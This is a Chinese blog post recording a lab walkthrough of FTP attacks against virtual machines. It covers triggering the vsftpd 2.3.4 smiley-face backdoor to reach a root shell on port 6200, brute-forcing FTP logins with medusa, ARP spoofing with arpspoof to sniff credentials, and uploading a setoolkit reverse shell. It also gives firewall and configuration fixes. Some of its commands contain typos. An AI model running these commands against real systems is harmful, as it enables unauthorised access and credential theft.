FTP笑脸漏洞

最新推荐文章于 2023-12-13 12:15:57 发布
最新推荐文章于 2023-12-13 12:15:57 发布
阅读量3.7k 收藏 22
点赞数 3
分类专栏: 漏洞实验
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44237647/article/details/104105607
版权

首先保证虚03拟机,kali虚拟机,metasploitable虚拟机主机相互ping的通。
FTP是C/S的模式。位于网络传输协议的应用层,21号端口通信。
03 ip 192.168.10.128
metasploitable ip 192.168.10.129 (简称meta)
kali ip 192.168.10.133
主机 ip 192.168.1.4
FTP在03,meta上搭建。

站点搭建
控制面板-》添加或删除程序-》添加删除组件-》应用程序服务器-》IIS的详细信息-》勾选FTP服务。
然后搭建的站点IIS中才会出现FTP站点

在kali上操作正常登陆
nc 192.168.10.128 21
user xxx
pass xxx
在kaili上匿名登陆
nc 192.168.10.128 21
user anonymous
pass 123 (密码输任意均可)
采用匿名登陆的方法
在这里插入图片描述
要勾选允许匿名连接
利用nmap探测漏洞笑脸漏洞
nmap --script=vuln -p 21 192.168.1.133
在这里插入图片描述
这就是笑脸漏洞,当FTP认证时,如果用户名中包含:) 则会出发监听6200号端接口的连接的shell
此时用nmap -p 6200 192.168.10.133查看连接情况
在这里插入图片描述
进行nc 192.168.10.133连接后
在这里插入图片描述
在这里插入图片描述
然后连接6200端口
在这里插入图片描述
完成漏洞利用
安全配置

防火墙 (解决后门)

iptables -A INPUT -p tcp -dport 6200 -j DROP
建立入站规则,不能从6200号端口进来
iptables -A OUTPUT -p tcp sport 6200 -j DROP
建立出站规则,不能从6200号端口出去

更改配置文件(解决匿名漏洞)

vsftp.conf allow_anonymous = no

FTP暴力破解
使用工具medusa(apt-get install medus)
medusa -h 192.168.10.128 -u admin1 -P /root/Desktop/dic.txt -M ftp
FTP嗅探(apt-get install dsniff)
(后来发现这个不成功,用另一台ubunt完成了这个实验,因为主机和kali不在同一网段)
使用arpspoof
arpsnoof - i eth0 192.168.1.1 -t 192.168.1.4
这里的ip是要欺骗的主机的网关和ip,eth0是kali的网卡。

FTP上传shell(在kali中生成,在主机中向03的FTP服务器上传)
使用setoolkit生成反弹shell。
通过xftp上传(一个软件)或者通过命令行上传
命令行
ftp 192.168.10.128
admin1
admin1
输入命令 PUT 文件路径
上传成功后
sessions -l 查看所有上传的连接
sessions - i 1 使用连接1

遇到的问题
错把03主机的Microsoft FTP Service当作笑脸漏洞。
FTP站点匿名登陆失败,重新安装了一遍成功了。

冬瓜小暖
关注
  • 3
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见漏洞加固方案
09-26
常见漏洞加固方案
VSFTPD2.3.4(笑脸漏洞)复现
柠檬i的博客
10-29 1524
vsftpd2.3.4在ftp认证时,如果用户名带有 " :) " ,那么6200端口就会存在一个root权限的shell,可以直接连接。
FTP笑脸漏洞复现
weixin_53303754的博客
10-17 82
Ftp笑脸漏洞复现(后门漏洞
qq_55857040的博客
12-13 4943
目录 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的21端口时,输入用户中带有“:) ”,密码任意,即可运行 vsf_sysutil_extra() :打开服务器的6200端口,并且不需要密码就能从6200端口以管理员身份登入目标服务器。因为输入用户名需要带有:),所以称笑脸漏洞 实验环境: 实验准备 实验过程 小总结 漏洞简介: 这个漏洞是开发者在软件中留下的后门漏洞,当连接带有vsftpd 2.3.4版本的服务器的...
VSFTP 2.3.4(笑脸漏洞)漏洞详解
m0_64593235的博客
04-18 1526
VSFTPD 2.3.4(笑脸漏洞)漏洞详解
笑脸漏洞(vsftpd 2.3.4)
qq_52321992的博客
07-12 764
VSFTPD(Very Secure FTP Daemon)是一个常用的FTP服务器软件。“vsftpd 2.3.4 Backdoor”(也称为 “vsFTPd 2.3.4 Backdoor” 或 “vsftpd v2.3.4 backdoor”)。该漏洞最初于2011年被公开发现,影响了VSFTPD 2.3.4版本。这个版本中的一个后门(backdoor)允许攻击者通过一个特殊的用户名和密码组合来获得未经授权的访问权限。
笑脸漏洞(VSFTP2.3.4)复现
dgjkkhcf的博客
07-24 4443
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root
渗透测试(笑脸漏洞
m0_74300881的博客
12-13 142
在vsftpd2.3.4中在6200端口存在一个shell,使得任何人都可以进行连接,并且VSFTPD v2.3.4 服务,是以 root 权限运行的,最终获取到的权限也是root。
vsftpd FTP Server lsc远程拒绝服务漏洞
07-03
vsftpd是Very Secure FTP daemon的缩写,是UNIX类平台上安全的FTP服务器。 vsftpd在处理ls.c时存在远程拒绝服务漏洞,远程攻击者可利用此漏洞造成受影响应用程序崩溃,拒绝服务合法用户。
扫描FTP默认漏洞工具
03-01
扫描FTP默认漏洞 扫描FTP默认漏洞 扫描FTP默认漏洞 扫描FTP默认漏洞
漏洞分析报告-FTP.docx
10-24
漏洞分析
redhat5-ftp漏洞rpm包
08-11
redhat5-ftp漏洞CVE-2011-0762的漏洞补丁,rpm -Uvh vsftpd-2.0.5-16.el5_6.1.i386.rpm
War-ftp 1.65安装包
01-17
War-ftp 1.65在xp_sp3下存在缓冲区溢出漏洞,可用于fuzz测试或exp编写练习
springboot(酒店管理系统)
04-25
开发语言:Java JDK版本:JDK1.8(或11) 服务器:tomcat 数据库:mysql 5.6/5.7(或8.0) 数据库工具:Navicat 开发软件:idea 依赖管理包:Maven 代码+数据库保证完整可用,可提供远程调试并指导运行服务(额外付费)~ 如果对系统的中的某些部分感到不合适可提供修改服务,比如题目、界面、功能等等... 声明: 1.项目已经调试过,完美运行 2.需要远程帮忙部署项目,需要额外付费 3.本项目有演示视频,如果需要观看,请联系我 4.调试过程中可帮忙安装IDEA,eclipse,MySQL,JDK,Tomcat等软件 重点: 需要其他Java源码联系我,更多源码任你选,你想要的源码我都有! 需要加v19306446185
BP神经网络matlab实例.doc
最新发布
04-25
数学模型算法
设计.zip
04-25
设计.zip
基于 Spring Cloud 组件构建的分布式服务架构
04-25
Java SSM项目是一种使用Java语言和SSM框架(Spring + Spring MVC + MyBatis)开发的Web应用程序。SSM是一种常用的Java开发框架组合,它结合了Spring框架、Spring MVC框架和MyBatis框架的优点,能够快速构建可靠、高效的企业级应用。 1. Spring框架:Spring是一个轻量级的Java开发框架,提供了丰富的功能和模块,用于开发企业级应用。它包括IoC(Inverse of Control,控制反转)容器、AOP(Aspect-Oriented Programming,面向切面编程)等特性,可以简化开发过程、提高代码的可维护性和可测试性。 2. Spring MVC框架:Spring MVC是基于Spring框架的Web框架,用于开发Web应用程序。它采用MVC(Model-View-Controller,模型-视图-控制器)的架构模式,将应用程序分为模型层、视图层和控制器层,提供了处理请求、渲染视图和管理流程的功能。 3. MyBatis框架:MyBatis是一个持久层框架,用于与数据库进行交互。它提供了一种将数据库操作与Java对象映射起来的方式,避免了手动编写繁琐的SQL语句,并提供了事务管理和缓存等功能,简化了数据库访问的过程
【微信小程序毕业设计】书店系统开发项目(源码+演示视频+说明).rar
04-25
【微信小程序毕业设计】书店系统开发项目(源码+演示视频+说明).rar 【项目技术】 微信小程序开发工具+java后端+mysql 【演示视频-编号:246】 https://pan.quark.cn/s/cb634e7c02b5 【实现功能】 用户信息管理,图书信息管理,图书类型管理,图书留言管理,论坛信息管理等
基于java的-44-17-宠物销售系统-源码.zip
04-25
提供的源码资源涵盖了Java应用等多个领域,每个领域都包含了丰富的实例和项目。这些源码都是基于各自平台的最新技术和标准编写,确保了在对应环境下能够无缝运行。同时,源码中配备了详细的注释和文档,帮助用户快速理解代码结构和实现逻辑。 适用人群: 适合毕业设计、课程设计作业。这些源码资源特别适合大学生群体。无论你是计算机相关专业的学生,还是对其他领域编程感兴趣的学生,这些资源都能为你提供宝贵的学习和实践机会。通过学习和运行这些源码,你可以掌握各平台开发的基础知识,提升编程能力和项目实战经验。 使用场景及目标: 在学习阶段,你可以利用这些源码资源进行课程实践、课外项目或毕业设计。通过分析和运行源码,你将深入了解各平台开发的技术细节和最佳实践,逐步培养起自己的项目开发和问题解决能力。此外,在求职或创业过程中,具备跨平台开发能力的大学生将更具竞争力。 其他说明: 为了确保源码资源的可运行性和易用性,特别注意了以下几点:首先,每份源码都提供了详细的运行环境和依赖说明,确保用户能够轻松搭建起开发环境;其次,源码中的注释和文档都非常完善,方便用户快速上手和理解代码;最后,我会定期更新这些源码资源,以适应各平台技术的最新发展和市场需求。 所有源码均经过严格测试,可以直接运行,可以放心下载使用。有任何使用问题欢迎随时与博主沟通,第一时间进行解答!
python 制作ftp漏洞扫描
05-12
下面是一个基本的Python代码示例,可以用来扫描FTP服务器的漏洞: ```python import ftplib def check_ftp_vuln(hostname): try: ftp = ftplib.FTP(hostname) ftp.login('anonymous', 'anonymous') ftp.cwd('/.ssh') print('[+] ' + hostname + ' is vulnerable to FTP') ftp.quit() except Exception as e: print('[-] ' + hostname + ' is not vulnerable to FTP') check_ftp_vuln('ftp.example.com') ``` 这个脚本基于ftplib库,使用FTP协议连接到指定的主机。它尝试使用匿名登录来访问主机上的.ssh目录。如果成功访问,则表示主机存在FTP漏洞。否则,它会输出“[-] hostname is not vulnerable to FTP”。 请注意,这只是一个基本示例,不能检测所有可能的FTP漏洞。对于更复杂的扫描,您可能需要使用其他工具和技术来检测更多的漏洞

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值